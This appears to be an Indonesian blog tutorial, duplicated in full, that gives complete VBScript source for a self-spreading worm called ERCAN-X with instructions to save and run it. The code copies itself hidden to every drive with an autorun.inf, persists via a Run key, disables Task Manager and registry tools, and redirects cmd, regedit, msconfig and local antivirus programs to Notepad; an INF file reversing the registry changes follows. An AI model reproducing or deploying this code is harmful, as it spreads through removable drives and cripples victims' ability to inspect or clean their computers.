virus note pad
VIRUS NOTEPAD ERCAN-X
' mari kita sekarang belajar bikin virus di notepad
'ok.sekarang kita mulai aja..
' pertama2 kita klik start>all program>Accessories>buka notepad dan sekarang tinggal copy-paste aja.key (hehehehehe)
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama 3rc4nms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ERCAN-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka adalah "Notepad"
SEKARANG KITA BUAT ANTINYA VIRUSNYA :
[Version]
Signature="$Chicago$"
Provider=Ercan
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
SELAMAT MENCOBA....!!!
sebelumnya ane mnta maaf sebesarnya kpd yg mengajarkan klo saya menuliskan in tanpa pengetahuan anda..
Tanpa berniat sok jago atau sok pinter,ane menuliskan ini bertujuan berbagi ilmu pengetahuan di bdang IT kpd yg lain..
Tapi ane juga butuh bantuan temen2 dan para senior ane di sini, karena ane juga masih oon dalam hal ini.
Mari kita sama sama belajar dan berbagi
thank's
' mari kita sekarang belajar bikin virus di notepad
'ok.sekarang kita mulai aja..
' pertama2 kita klik start>all program>Accessories>buka notepad dan sekarang tinggal copy-paste aja.key (hehehehehe)
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama 3rc4nms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ERCAN-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka adalah "Notepad"
SEKARANG KITA BUAT ANTINYA VIRUSNYA :
[Version]
Signature="$Chicago$"
Provider=Ercan
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
SELAMAT MENCOBA....!!!
sebelumnya ane mnta maaf sebesarnya kpd yg mengajarkan klo saya menuliskan in tanpa pengetahuan anda..
Tanpa berniat sok jago atau sok pinter,ane menuliskan ini bertujuan berbagi ilmu pengetahuan di bdang IT kpd yg lain..
Tapi ane juga butuh bantuan temen2 dan para senior ane di sini, karena ane juga masih oon dalam hal ini.
Mari kita sama sama belajar dan berbagi
thank's
Komentar